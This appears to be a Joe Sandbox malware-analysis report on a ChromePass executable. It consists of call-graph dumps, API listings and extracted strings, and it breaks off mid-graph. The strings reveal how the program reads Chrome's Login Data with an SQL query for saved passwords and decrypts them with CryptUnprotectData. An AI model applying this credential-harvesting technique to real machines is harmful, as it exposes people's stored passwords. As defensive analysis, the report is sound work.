40b517 25 API calls 21643->21708 21649 416421 RtlLeaveCriticalSection 21649->21637 21650->21583 21651->21583 21652->21583 21653->21583 21654->21583 21655->21583 21656->21563 21657->21571 21658->21574 21659->21585 21660->21625 21662 421d02 21661->21662 21663 421d64 21661->21663 21662->21663 21665 421d0e 21662->21665 21664 42a11f 126 API calls 21663->21664 21671 421d54 21664->21671 21666 421d13 21665->21666 21667 421d2b 21665->21667 21669 40c04b 25 API calls 21666->21669 21668 40b480 12 API calls 21667->21668 21670 421d32 21668->21670 21691 421d21 RtlLeaveCriticalSection 21669->21691 21670->21671 21673 42a11f 126 API calls 21670->21673 21672 421dad 21671->21672 21674 421bd1 63 API calls 21671->21674 21677 41c8c3 17 API calls 21672->21677 21678 421dc8 21672->21678 21675 421d4b 21673->21675 21674->21672 21676 40b168 free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 21675->21676 21676->21671 21677->21678 21680 40b480 12 API calls 21678->21680 21681 421e0a 21678->21681 21679 4161c6 90 API calls 21682 421e1e 21679->21682 21680->21681 21681->21679 21681->21682 21683 421e5b 21682->21683 21684 421e3e 21682->21684 21686 40c04b 25 API calls 21683->21686 21685 40c04b 25 API calls 21684->21685 21687 421e4e 21685->21687 21688 421e59 21686->21688 21689 40b168 free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 21687->21689 21690 40b517 25 API calls 21688->21690 21689->21688 21690->21691 21691->21623 21692->21637 21694 4162db 21693->21694 21695 4162e3 21693->21695 21694->21637 21695->21694 21696 416302 21695->21696 21697 416877 86 API calls 21695->21697 21696->21694 21702 40c04b 25 API calls 21696->21702 21698 416335 21697->21698 21699 40c04b 25 API calls 21698->21699 21700 416341 21699->21700 21701 40b517 25 API calls 21700->21701 21701->21696 21702->21694 21703->21637 21704->21637 21705->21637 21706->21637 21707->21649 21708->21636 21709->21639 21710->21643 21712 40bdcd 21711->21712 21717 40b58e 21712->21717 21720 40b5b0 __aullrem __aulldvrm 21717->21720 21724 40bc0c 21717->21724 21718 40bc0e 21734 40bc6a 16 API calls 21718->21734 21720->21718 21721 40b549 16 API calls 21720->21721 21722 40ba4e strlen 21720->21722 21723 40b168 4 API calls 21720->21723 21720->21724 21725 40b9ce memset 21720->21725 21726 40bc6a 16 API calls 21720->21726 21727 40b0a5 11 API calls 21720->21727 21721->21720 21722->21720 21723->21720 21728 40bd60 21724->21728 21725->21720 21726->21720 21727->21720 21729 40bd68 21728->21729 21732 40bda0 21728->21732 21730 40b0a5 11 API calls 21729->21730 21729->21732 21731 40bd86 21730->21731 21731->21732 21733 40bd8e memcpy 21731->21733 21732->21451 21733->21732 21734->21724 21735->21295 21736->21299 21737->21310 21738->21314 21739->21303 21740->21313 21741->21317 21742->21319 21743->21321 21744->21323 21745->21325 21746->21327 21747->21333 21748->21336 21749->21338 21750->21346 21751->21346 21752->21342 21753->21355 21754->21355 21755->21361 21756->21361 21757->21361 21758->21361 21759->21361 21760->21361 21761->21369 21762->21369 21763->21369 21764->21333 22342 40a778 22345 40a649 22342->22345 22344 40a798 22346 40a655 22345->22346 22347 40a667 GetPrivateProfileIntW 22345->22347 22350 40a556 memset _itow WritePrivateProfileStringW 22346->22350 22347->22344 22349 40a662 22349->22344 22350->22349 22499 428d7a 19 API calls 22501 41fb78 19 API calls 22502 406d79 SendMessageW SendMessageW SendMessageW 22505 40157e ??2@YAPAXI memset memcpy ??3@YAXPAX 22506 41ef7e 19 API calls 22507 41bb01 20 API calls 22508 40cf01 SetFilePointer GetLastError WriteFile 22509 408502 8 API calls 22510 428d00 21 API calls 22511 40d702 8 API calls 22516 405d0a GetParent GetWindowRect GetClientRect MapWindowPoints SetWindowPos 22517 41f70b 29 API calls 22520 41fd0f 20 API calls 22521 40d511 38 API calls 22523 401f16 24 API calls 22524 428f18 16 API calls 20790 429b23 127 API calls 20843 418929 20844 419117 20843->20844 20845 418939 20843->20845 20846 418970 20845->20846 20847 418969 20845->20847 20854 4168c7 20845->20854 20873 411e1f 74 API calls 20846->20873 20857 411d44 20847->20857 20853 416fe7 20855 416b5c 20854->20855 20856 416998 20854->20856 20870 414172 free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 20854->20870 20872 415583 86 API calls 20855->20872 20871 40b4a0 16 API calls 20856->20871 20858 411d54 20857->20858 20860 411d5a 20857->20860 20887 410323 74 API calls 20858->20887 20861 411da5 20860->20861 20862 411d6b 20860->20862 20863 411dc7 20860->20863 20874 411808 20861->20874 20862->20854 20863->20862 20868 411de1 20863->20868 20883 411880 20863->20883 20868->20862 20869 411d44 74 API calls 20868->20869 20869->20862 20870->20854 20871->20855 20872->20853 20873->20854 20888 410aea 20874->20888 20878 41183a 20878->20862 20879 411963 20878->20879 20881 411968 20879->20881 20880 411998 20880->20862 20881->20880 20882 411808 55 API calls 20881->20882 20882->20881 20884 411895 20883->20884 20885 410b2e 24 API calls 20884->20885 20886 41189c 20885->20886 20886->20863 20887->20860 20889 410af7 20888->20889 20893 410af2 20888->20893 20898 410a9b 20889->20898 20891 410b01 20892 410b2e 24 API calls 20891->20892 20891->20893 20892->20893 20893->20878 20894 410b2e 20893->20894 20895 410b33 20894->20895 20896 410b3b 20894->20896 21042 40f96d 24 API calls 20895->21042 20896->20878 20901 40f7de 20898->20901 20900 410aaf 20900->20891 20902 40f7f9 20901->20902 20919 40f8a7 20901->20919 20902->20919 20921 40f4c6 20902->20921 20904 40f821 20905 40f840 20904->20905 20906 40f93b 20904->20906 20904->20919 20951 40f6e0 20 API calls 20905->20951 20906->20919 20958 40f7bf SetFilePointer GetLastError ReadFile memset memcpy 20906->20958 20909 40f84c 20910 40f892 20909->20910 20911 40f884 memset 20909->20911 20909->20919 20952 40ee9a 20910->20952 20911->20910 20913 40f8e1 20914 40f8eb memset 20913->20914 20920 40f89e 20913->20920 20914->20919 20916 40f897 20916->20913 20917 40f8bf 20916->20917 20916->20920 20957 40f460 SetFilePointer GetLastError ReadFile memset memcpy 20917->20957 20919->20900 20920->20919 20956 40f96d 24 API calls 20920->20956 20922 40f4de 20921->20922 20925 40f4fe 20921->20925 20922->20925 21004 40e0de free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 20922->21004 20923 40f538 20923->20904 20924 40f53d 20959 40f37f 20924->20959 20925->20923 20925->20924 20928 40f52f 20925->20928 21005 40db0d free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 20928->21005 20931 40f65b 20934 40f54b 20931->20934 20935 40ee9a 4 API calls 20931->20935 20933 40f5c7 20933->20934 20984 40e72b 20933->20984 20934->20923 21008 40e144 free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 20934->21008 20938 40f668 20935->20938 20936 40f57f 21006 40db0d free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 20936->21006 20938->20934 20941 40f696 memset 20938->20941 20942 40f678 20938->20942 20939 40f64b 20939->20931 20939->20936 20944 40f6a5 memcmp 20941->20944 20998 40ce7a SetFilePointer 20942->20998 20944->20934 20946 40f6be 20944->20946 21007 40e0de free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 20946->21007 20951->20909 20953 40eeb6 20952->20953 20954 40eeae __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20952->20954 20953->20954 21041 40db0d free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 20953->21041 20954->20916 20956->20919 20957->20920 20958->20919 20960 40f390 20959->20960 20963 40f38c 20959->20963 20960->20963 20964 40d4ac 14 API calls 20960->20964 20961 40f3a2 20962 40ee9a 4 API calls 20961->20962 20961->20963 20962->20963 20963->20931 20963->20933 20963->20934 20963->20936 20965 40d4ac 20963->20965 20964->20961 20966 40d2cb 11 API calls 20965->20966 20967 40d4b9 20966->20967 20968 40d4c0 20967->20968 20969 40cc6d GetVersionExW 20967->20969 20968->20933 20974 40d302 20968->20974 20970 40d4cb 20969->20970 20971 40d4d0 GetFileAttributesW 20970->20971 20972 40d4d8 GetFileAttributesA 20970->20972 20973 40d4de free 20971->20973 20972->20973 20973->20968 20977 40d310 20974->20977 20975 40d2cb 11 API calls 20975->20977 20976 40cc6d GetVersionExW 20976->20977 20977->20975 20977->20976 20978 40d381 CreateFileA 20977->20978 20979 40d379 CreateFileW 20977->20979 20980 40d3c6 memset free 20977->20980 20981 40d38e free 20977->20981 20982 40d3bd 20977->20982 20978->20977 20979->20977 20980->20982 20981->20977 20981->20982 20982->20933 20985 40e74d 20984->20985 20986 40e7a5 20985->20986 20987 40e8da 20985->20987 20988 40db3e 5 API calls 20985->20988 20986->20939 20987->20986 21009 40db3e 20987->21009 20995 40e77d __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20988->20995 20995->20986 20995->20987 21029 40e676 free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId memset 20995->21029 21030 40e338 6 API calls 20995->21030 21031 40de19 18 API calls 20995->21031 20999 40ceb8 ReadFile 20998->20999 21000 40cea9 GetLastError 20998->21000 21001 40ceb3 20999->21001 21002 40cedc 20999->21002 21000->20999 21000->21001 21001->20934 21001->20944 21002->21001 21003 40cee7 memset 21002->21003 21003->21001 21004->20925 21005->20923 21006->20934 21007->20934 21008->20923 21010 40db52 21009->21010 21013 40db9a 21010->21013 21033 40dab7 SetFilePointer GetLastError ReadFile memset 21010->21033 21012 40db87 21012->21013 21034 40dab7 SetFilePointer GetLastError ReadFile memset 21012->21034 21013->20986 21021 40e1fb 21013->21021 21015 40dbb9 21015->21013 21035 40aef9 21015->21035 21018 40dbe9 memcmp 21018->21013 21019 40dc00 21018->21019 21020 40aef9 4 API calls 21019->21020 21020->21013 21022 40e218 21021->21022 21026 40e211 21021->21026 21038 41023f free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 21022->21038 21024 40e248 21040 40d9c2 free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 21024->21040 21025 40e21f 21025->21024 21025->21026 21039 40db0d free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 21025->21039 21026->20986 21032 40e4c8 20 API calls 21026->21032 21029->20995 21030->20995 21031->20995 21032->20986 21033->21012 21034->21015 21037 40ce7a 4 API calls 21035->21037 21036 40af0f 21036->21013 21036->21018 21037->21036 21038->21025 21039->21024 21040->21026 21041->20954 21042->20896 22531 428920 26 API calls 22535 4168c7 94 API calls 22536 41eb36 20 API calls 22538 401338 11 API calls 22540 410b3d 24 API calls 22542 40413f 6 API calls 22543 40233f 55 API calls 22544 41fd3e 26 API calls 22547 4168c7 86 API calls 22550 40a7c7 WritePrivateProfileStringW GetPrivateProfileStringW 21043 40b3c8 21044 40b3d8 21043->21044 21045 40b3cf 21043->21045 21047 40b1ac 21045->21047 21048 40b1c6 21047->21048 21049 40b1ba 21047->21049 21051 40b1d8 21048->21051 21052 40b1ca 21048->21052 21065 40b0a5 21049->21065 21083 40b344 RtlEnterCriticalSection GetCurrentThreadId 21051->21083 21078 40b168 21052->21078 21053 40b1c0 21053->21044 21056 40b1eb 21057 40b22b realloc 21056->21057 21084 40b03b RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 21056->21084 21058 40b23d 21057->21058 21064 40b256 21057->21064 21085 40b03b RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 21058->21085 21061 40b2a1 RtlLeaveCriticalSection 21061->21053 21062 40b22a 21062->21057 21063 40b243 realloc 21063->21061 21063->21064 21064->21061 21066 40b161 21065->21066 21067 40b0b7 21065->21067 21066->21053 21086 40b019 21067->21086 21069 40b0ec malloc 21070 40b110 21069->21070 21071 40b0fc 21069->21071 21073 40b152 RtlLeaveCriticalSection 21070->21073 21094 40b03b RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 21071->21094 21073->21066 21075 40b102 malloc 21075->21070 21075->21073 21077 40b0eb 21077->21069 21079 40b170 21078->21079 21080 40b1ab 21078->21080 21097 40b344 RtlEnterCriticalSection GetCurrentThreadId 21079->21097 21080->21053 21082 40b183 free RtlLeaveCriticalSection 21082->21080 21083->21056 21084->21062 21085->21063 21087 40b034 21086->21087 21088 40b024 21086->21088 21095 40b344 RtlEnterCriticalSection GetCurrentThreadId 21087->21095 21096 40b2b6 11 API calls 21088->21096 21091 40b02b 21091->21087 21092 40b039 21092->21069 21093 40b03b RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 21092->21093 21093->21077 21094->21075 21095->21092 21096->21091 21097->21082 22551 41e9c8 27 API calls 22553 41ebcf 28 API calls 22554 40d1d3 LockFile UnlockFile 22555 4139d2 74 API calls 22556 4168c7 89 API calls 22557 40d7d3 GetSystemTimeAsFileTime 22558 428bd6 22 API calls 22559 41fbd7 18 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 22560 41fdd7 20 API calls 22561 40cfd6 GetFileSize 22563 4111db free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 22564 428fdc 23 API calls 22565 4293e2 23 API calls 22568 4168c7 87 API calls 22569 41efe9 23 API calls 22572 4289cc 25 API calls 22574 4168c7 88 API calls 22575 428fed 27 API calls 22576 4081f1 11 API calls 22579 4168c7 101 API calls 22583 418f82 128 API calls 22585 41f384 26 API calls 22586 41ed84 25 API calls 22588 40cf86 SetFilePointer SetEndOfFile 22589 40418f SendDlgItemMessageW SetDlgItemTextW GetDlgItemTextW SendDlgItemMessageW SendDlgItemMessageW 22590 4168c7 88 API calls 22592 42ad93 _onexit 22593 402797 modf 22595 42979a 48 API calls 22597 428999 25 API calls 22599 40279c 16 API calls 22601 4013a1 memcpy memcpy GetModuleHandleW DialogBoxParamW 20826 40a7a2 20829 40a5a3 20826->20829 20830 40a5b0 20829->20830 20831 40a602 memset GetPrivateProfileStringW 20830->20831 20832 40a5cf memset 20830->20832 20837 4052e7 wcslen 20831->20837 20842 40525e _snwprintf memcpy 20832->20842 20835 40a641 20836 40a5e5 WritePrivateProfileStringW 20836->20835 20838 4052fb 20837->20838 20839 4052fd 20837->20839 20838->20835 20840 405333 wcstoul 20839->20840 20841 405351 20839->20841 20840->20839 20841->20835 20842->20836 22603 42ada1 __dllonexit 22605 4289cc 27 API calls 22606 4289ab 26 API calls 22607 4099ad 67 API calls 22608 40d7ae Sleep 22609 40a9b0 memset SHGetPathFromIDListW SendMessageW 22610 4013b1 ExitProcess 22611 41efb0 16 API calls 22615 4168c7 97 API calls 22616 405dbe 8 API calls 22617 40cfbe FlushFileBuffers

                                        Executed Functions

                                        Function 00409720 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 168COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004033D0: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004033EF
                                          • Part of subcall function 004033D0: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403401
                                          • Part of subcall function 004033D0: FreeLibrary.KERNEL32(00000000), ref: 00403415
                                          • Part of subcall function 004033D0: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403440
                                        • SetErrorMode.KERNELBASE(00008001), ref: 00409748
                                        • GetModuleHandleW.KERNEL32(00000000,0040A8CF,00000000), ref: 00409761
                                        • EnumResourceTypesW.KERNEL32(00000000), ref: 00409768
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,/deleteregkey,/savelangfile), ref: 004097FE
                                        • DeleteObject.GDI32(?), ref: 00409818
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: Library$??3@AddressDeleteEnumErrorFreeHandleLoadMessageModeModuleObjectProcResourceTypes
                                        • String ID: $/deleteregkey$/savelangfile
                                        • API String ID: 3591293073-28296030
                                        • Opcode ID: 35b8df080bc2080e27bc36b60c2643d49e0eaed20a2b05d61420e0365af72530
                                        • Instruction ID: ed94949e07262d2860e77650e53181bcd1e3b97a6f049840a4915c6ce7c1fc3d
                                        • Opcode Fuzzy Hash: 35b8df080bc2080e27bc36b60c2643d49e0eaed20a2b05d61420e0365af72530
                                        • Instruction Fuzzy Hash: 526190B1508342DBC720AFA2DC49A5FBBE9FF84304F40493EF585A2262DB758915CF5A
                                        Function 00401922 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 292filelibraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • memset.MSVCRT ref: 00401948
                                        • CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040195F
                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00401982
                                          • Part of subcall function 00405422: MultiByteToWideChar.KERNEL32(00000000,00000000,00401AC1,000000FF,?,?,00401AC1,?,?,000003FF), ref: 00405434
                                          • Part of subcall function 004165AD: RtlLeaveCriticalSection.NTDLL(?), ref: 004165C9
                                        • CloseHandle.KERNELBASE(00000000), ref: 0040198B
                                        • memset.MSVCRT ref: 004019BB
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 004019D2
                                        • memset.MSVCRT ref: 00401A3E
                                          • Part of subcall function 00404B38: GetTempPathW.KERNEL32(00000104,?), ref: 00404B4F
                                          • Part of subcall function 00404B38: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00404B61
                                          • Part of subcall function 00404B38: GetTempFileNameW.KERNEL32(?,0040197A,00000000,?), ref: 00404B78
                                        • LoadLibraryW.KERNEL32(crypt32.dll), ref: 00401B85
                                        • GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00401B9A
                                        • FreeLibrary.KERNEL32(00000000), ref: 00401BCD
                                        • memset.MSVCRT ref: 00401C19
                                        • memcpy.MSVCRT(?,00000000,00000000,000000FF,00000414,00000000), ref: 00401C2C
                                        • MultiByteToWideChar.KERNEL32 ref: 00401C51
                                        • LocalFree.KERNEL32(00000000), ref: 00401C5A
                                        • DeleteFileW.KERNEL32(?), ref: 00401CA1
                                          • Part of subcall function 0040315B: memcmp.MSVCRT(?,00000414,00000005,00000000,00000000,000000FF), ref: 00403198
                                          • Part of subcall function 0040315B: memset.MSVCRT ref: 004031B9
                                          • Part of subcall function 0040315B: memset.MSVCRT ref: 004031D5
                                          • Part of subcall function 0040315B: memset.MSVCRT ref: 0040320E
                                          • Part of subcall function 0040315B: memset.MSVCRT ref: 0040322A
                                        Strings
                                        • crypt32.dll, xrefs: 00401B80
                                        • chp, xrefs: 0040196A
                                        • SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins , xrefs: 00401A02
                                        • CryptUnprotectData, xrefs: 00401B94
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memset$File$ByteCharMultiWide$FreeLibraryTemp$AddressCloseCopyCreateCriticalDeleteDirectoryHandleLeaveLoadLocalNamePathProcSectionWindowsmemcmpmemcpy
                                        • String ID: CryptUnprotectData$SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins $chp$crypt32.dll
                                        • API String ID: 3739329394-3935444698
                                        • Opcode ID: 492ea2985a48da43712046777eb980aa399b26ce661c150a15ad42de6d304c3c
                                        • Instruction ID: 37b8e6ad1c2f444f68e26bcb06950449ee6f7690af2a1aeb5c6f76d6147c7710
                                        • Opcode Fuzzy Hash: 492ea2985a48da43712046777eb980aa399b26ce661c150a15ad42de6d304c3c
                                        • Instruction Fuzzy Hash: 52A1A272900218AFDB10ABA4DC85FEE7779EF04318F50457AF914F7291EB389E848B59
                                        Function 0042AE90 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 139 42ae90-42aeaa call 42b0a0 GetModuleHandleA 142 42aecb-42aece 139->142 143 42aeac-42aeb7 139->143 145 42aef7-42af46 __set_app_type __p__fmode __p__commode call 40705c 142->145 143->142 144 42aeb9-42aec2 143->144 146 42aee3-42aee7 144->146 147 42aec4-42aec9 144->147 154 42af54-42afaa call 42b08c _initterm __wgetmainargs _initterm 145->154 155 42af48-42af53 __setusermatherr 145->155 146->142 150 42aee9-42aeeb 146->150 147->142 149 42aed0-42aed7 147->149 149->142 152 42aed9-42aee1 149->152 153 42aef1-42aef4 150->153 152->153 153->145 158 42afba-42afc1 154->158 159 42afac-42afb5 154->159 155->154 161 42afc3-42afce 158->161 162 42b008-42b00c 158->162 160 42b074-42b079 call 42b0d9 159->160 164 42afd0-42afd4 161->164 165 42afd6-42afda 161->165 166 42afe1-42afe7 162->166 167 42b00e-42b013 162->167 164->161 164->165 165->166 169 42afdc-42afde 165->169 170 42afe9-42afed 166->170 171 42afef-42b000 GetStartupInfoW 166->171 167->162 169->166 170->169 170->171 172 42b002-42b006 171->172 173 42b015-42b017 171->173 174 42b018-42b030 GetModuleHandleA call 409720 172->174 173->174 177 42b032-42b033 exit 174->177 178 42b039-42b072 _cexit 174->178 177->178 178->160
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                        • String ID:
                                        • API String ID: 2827331108-0
                                        • Opcode ID: e0751aec1486ceef8b5882055fc93caa6edd968f6601c79cd871996c5dd874b0
                                        • Instruction ID: 601f2f4c144d1a6f5b028c6b48ba5c4040d8dd7e292e416d485a145d7e2d090f
                                        • Opcode Fuzzy Hash: e0751aec1486ceef8b5882055fc93caa6edd968f6601c79cd871996c5dd874b0
                                        • Instruction Fuzzy Hash: 4B519071E40225DBCB35EFA4E9849AE77B0FB44310FA1452BE86197291D73C4983CB9E
                                        Function 0040212B Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 180 40212b-4021ac memset _snwprintf memset wcslen * 2 181 4021c6 180->181 182 4021ae-4021c4 call 404d63 180->182 184 4021cb-4021d8 call 404b83 181->184 182->184 188 4021da-4021e8 call 401922 184->188 189 4021ed-402224 _snwprintf wcslen * 2 184->189 188->189 191 402226-40223c call 404d63 189->191 192 40223e 189->192 194 402243-402250 call 404b83 191->194 192->194 198 402252-402260 call 401922 194->198 199 402265-40226b 194->199 198->199
                                        APIs
                                        Strings
                                        • %s\User Data\Default\Web Data, xrefs: 00402163
                                        • %s\User Data\Default\Login Data, xrefs: 004021F7
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: wcslen$_snwprintfmemset$wcscatwcscpy
                                        • String ID: %s\User Data\Default\Login Data$%s\User Data\Default\Web Data
                                        • API String ID: 798694999-429399637
                                        • Opcode ID: 45261314242161afbbebf0664bc0bb71ab186811fdfce6921e4fb762442c369c
                                        • Instruction ID: 2ae69603a04c5ddda3a347a726102e89345d5e74ea1ed18f83a6d4f8f798cee6
                                        • Opcode Fuzzy Hash: 45261314242161afbbebf0664bc0bb71ab186811fdfce6921e4fb762442c369c
                                        • Instruction Fuzzy Hash: B331A0725182096BC720EFA5EC89D9B73EDEF84318F54093FF914D2091EB38D618875A
                                        Function 00408CC1 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: FileModuleNamememsetwcscatwcsrchr
                                        • String ID: .cfg$/external$SaveFilterIndex$ShowGridLines$ShowInfoTip
                                        • API String ID: 776488737-70440992
                                        • Opcode ID: 9f0940807e79b34fa8acd1bb0c5ca660b4dc9a2855fd62aba484d8026d41d478
                                        • Instruction ID: eace5aa0097f5313b0bb8351d432f4c8056799947b8a36fbe208cfe9949a56c2
                                        • Opcode Fuzzy Hash: 9f0940807e79b34fa8acd1bb0c5ca660b4dc9a2855fd62aba484d8026d41d478
                                        • Instruction Fuzzy Hash: D041C7326502289BDB10EF50DC85FCA7379FF44714F4400BAE90CAB281D775AA94CF99
                                        Function 0040EB21 Relevance: 13.8, APIs: 8, Strings: 1, Instructions: 287stringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 227 40eb21-40eb6d call 40b0a5 230 40ee20-40ee22 227->230 231 40eb73-40eb78 227->231 234 40ee23-40ee27 230->234 232 40eb7a-40eb7d 231->232 233 40eb8b-40eb91 231->233 232->233 235 40eb7f-40eb89 232->235 237 40eb94-40eb99 233->237 235->237 239 40eba8-40ebc9 strlen 237->239 240 40eb9b-40eba3 call 40b168 237->240 244 40ebcb 239->244 245 40ebdd-40ec06 strlen call 40b358 239->245 240->234 246 40ebcd-40ebd8 call 40b168 244->246 250 40ec08-40ec0b 245->250 251 40ec0d-40ec8a memcpy * 2 call 40b168 245->251 246->234 250->246 255 40ed03-40ed0a 251->255 256 40ec8c-40ec8f 251->256 257 40ed0e-40ed17 call 40b358 255->257 256->255 258 40ec91-40ec99 256->258 263 40ed1d-40ed24 257->263 260 40eca4-40ecb8 call 40d302 258->260 261 40ec9b-40eca2 258->261 266 40ecbb-40ecce 260->266 261->263 264 40ee0a-40ee1e call 40aee8 call 40b168 263->264 265 40ed2a-40ed49 memcpy strlen 263->265 264->230 264->234 267 40ed66-40ed98 memcpy * 2 265->267 268 40ed4b-40ed4e 265->268 266->263 270 40ecd0-40ecd2 266->270 274 40eda4 267->274 275 40ed9a-40ed9d 267->275 271 40ed52-40ed55 268->271 270->257 273 40ecd4-40ecde 270->273 278 40ed57-40ed5b 271->278 279 40ed5d-40ed5f 271->279 281 40ece0-40ece4 273->281 282 40ece6 273->282 277 40eda6-40edd6 274->277 275->274 276 40ed9f-40eda2 275->276 276->277 284 40ede1-40ede3 277->284 285 40edd8-40eddb 277->285 278->271 278->279 279->267 286 40ed61 